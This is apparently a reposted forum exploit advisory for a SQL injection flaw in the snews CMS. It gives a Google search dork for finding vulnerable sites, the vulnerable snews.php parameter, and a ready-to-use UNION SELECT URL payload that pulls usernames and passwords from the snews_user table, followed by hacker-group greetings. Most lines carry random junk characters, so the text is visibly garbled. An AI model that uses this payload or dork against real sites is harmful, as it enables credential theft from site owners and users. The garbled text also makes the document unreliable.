标题: CMS snews SQL Injection Vulnerability
3 F- @" v1 _& t; `0 `" L8 n作者: By onestree
" @2 B; K* t7 k& B$ y下载地址 : http://snewscms.com/" w( R9 w d8 n1 k2 F) G
测试平台 : ubuntu 12.10 / win 7
; @4 M: B7 o7 L, K关键词: inurl:"tanyakan pada rumput yang bergoyang"- m8 Z) g3 r# s& c
+ B, u! U3 W$ j7 I% E$ r. b
! A4 A! M- [) K8 ?; R, Y$ M, f
*************************************************************
% K4 @3 ?% K) e/ T+ y" K4 t
+ Q% @* P1 P& R- q" WSQL poc:
5 z) N5 d) ?: i; o" m0 m1 U ! j7 ]% q5 l% R& l. ^
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]1 B. u. i# {% |0 x) g5 j- u1 ^
5 |7 `5 O9 ?" a; h5 q示例
$ d9 [; R. J8 w% o! L ! z, h9 `( k: b" A' H! x; i
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
! `; K' a9 `; }2 s5 L
6 ^1 B6 {: W* y. g- E
7 \5 G4 E1 [+ W2 B" A8 j. m" v6 ]+ B致谢:
7 ], U; r, ^6 ^# l2 M$ }
8 n+ O0 M* m6 c7 V. c, b. J, k Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell" [, Y$ P% |9 p+ ^+ o; f% u
# S5 b) |# x7 x; N indonesiancoder - moeslimh4x0r - go-coder7 Z! p; K3 G, W8 G2 y
! @& d) ^* y8 N! y. } A1 Fspesial my hunny :*
( l$ z3 S8 `1 Y |
发表于 2013-1-23 08:55:06
收藏
支持
反对